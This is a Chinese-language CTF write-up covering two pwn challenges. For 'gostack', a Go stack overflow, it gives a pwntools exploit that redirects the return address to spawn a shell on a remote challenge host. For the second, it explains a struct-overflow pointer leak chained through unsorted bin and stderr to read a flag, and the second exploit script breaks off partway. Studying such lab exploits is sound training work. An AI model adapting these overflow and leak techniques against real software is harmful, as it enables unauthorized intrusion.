writeups

PWN gostack 题目简介 libc: 2.35 exploit point: stack overflow golang编写的一道栈题，有一个无限制的输入，通过gdb动调找出偏移量，覆盖ret地址为main_main2，开启一个bash exp from pwn import * binary_path = './gostack' libc_path = "/lib/x86_64-linux-gnu/libc.so.6" context(arch="amd64",os="linux",log_level="debug") elf = ELF(binary_path) libc = ELF(libc_path) p=remote('8.147.128.251',30914) leak_addr = lambda name,addr: log.success(f'{name}----->'+hex(addr)) main_arena_offset = libc.symbols["__malloc_hook"] + 0x10 #global_max_fast_offset = 0x3c67f8 #free_hook_offset = libc.symbols["__free_hook"] def debug(): gdb.attach(p) pause() def pwn(): payload = b"a"*256 + p64(0X4a05a0) + p64(101) payload = payload.ljust(464,b"a") + p64(0X4a05a0) #print(payload) p.sendline(payload) p.interactive() if __name__ == "__main__": pwn() orange_cat_diary 题目简介 libc: 2....

题目分析 竟然给了源码0.0，直接开看！！！ flag以全局变量存在bss段中 checksec一下果然开了PIE……. 继续看源码，建立了一个结构体，并将成员分别输出 结构体如下 typedef struct { char username[32]; char *description; } User; 漏洞点在于第一个read语句，对username的读入会覆盖掉description，可以打开pwndbg看结构体在内存上的分布 username占0x20，却可以读入0x28个字节，将0x55555555c5f0（description）给覆盖，之后在将description给输出时，有一个任意内存泄露 想到这，我们就可以通过泄露的方式将flag给读出 漏洞利用 由于开了PIE，低三位是不变的，先看看flag的地址 第三位是0X0C0，由于没有内存直接指向flag，先看看周围的内存空间，发现flag上面有std_err 一般libc中都会有内存指向std_err，所以在libc中搜索一下，果然发现了 由于libc中偏移是固定的，所以现在只需要泄露个libc地址就ok了，在堆附近可以看到有一个unsorted bin，泄露出它的fd就行了 总结，我们的leak路线就是unsorted_bin.fd—–> stderr——–>flag 泄露FD上的libc是1/16的几率爆破 由于远程偏移不一样，我们开一个docker容器将里面的libc和ld给拿出来 sudo docker run -p 5000:5000 --privileged $(sudo docker build -q .) 之后就是让人崩溃的偏移调试。。。。最终偏移是通过泄露出了附近的地址手动确定的 exp from pwn import * context(os = 'linux',arch = 'amd64',log_level = 'debug',timeout=0.5) binary_path = './leakleakleak' libc_path = './libc.so.6' elf = ELF(binary_path) #leak_addr = lambda name,addr: log.success(f'{name}----->'+hex(addr)) #main_arena_offset = libc.symbols["__malloc_hook"] + 0x10 def debug(): gdb....